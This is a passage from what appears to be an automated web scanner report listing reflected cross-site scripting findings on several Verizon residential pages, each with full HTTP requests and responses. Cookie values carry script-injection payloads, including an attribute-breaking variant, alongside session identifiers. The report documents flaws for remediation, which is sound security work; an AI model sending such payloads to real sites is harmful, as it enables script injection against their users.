Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX9ed63'><script>alert(1)</script>aba8646129c; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68020
Expires: Sat, 20 Nov 2010 03:14:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:48 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9ed63'><script>alert(1)</script>aba8646129c; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9ED63'><SCRIPT>ALERT(1)</SCRIPT>ABA8646129C ' />
...[SNIP]...

3.202. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 56a2d<script>alert(1)</script>eac0704937d was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX56a2d<script>alert(1)</script>eac0704937d; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68015
Expires: Sat, 20 Nov 2010 03:15:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:15:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX56a2d<script>alert(1)</script>eac0704937d; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX56A2D<SCRIPT>ALERT(1)</SCRIPT>EAC0704937D </DIV>
...[SNIP]...

3.203. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 98e16<script>alert(1)</script>9d0879de158 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX98e16<script>alert(1)</script>9d0879de158; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68015
Expires: Sat, 20 Nov 2010 00:09:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX98e16<script>alert(1)</script>9d0879de158; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX98E16<SCRIPT>ALERT(1)</SCRIPT>9D0879DE158 </DIV>
...[SNIP]...

3.204. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c0257'><script>alert(1)</script>be1613d7d65 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc0257'><script>alert(1)</script>be1613d7d65; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68019
Expires: Sat, 20 Nov 2010 00:09:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc0257'><script>alert(1)</script>be1613d7d65; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC0257'><SCRIPT>ALERT(1)</SCRIPT>BE1613D7D65 ' />
...[SNIP]...

3.205. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 640aa<script>alert(1)</script>383bb65ea2f was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX640aa<script>alert(1)</script>383bb65ea2f; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57963
Expires: Sat, 20 Nov 2010 03:14:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:38 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX640aa<script>alert(1)</script>383bb65ea2f; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Verizon High Speed Internet: Installation
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/products_
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX640AA<SCRIPT>ALERT(1)</SCRIPT>383BB65EA2F </DIV>
...[SNIP]...

3.206. http://www22.verizon.com/Residential/HighSpeedInternet/Installation/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Installation/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6487d'><script>alert(1)</script>b45a269dda5 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Installation/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX6487d'><script>alert(1)</script>b45a269dda5; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; 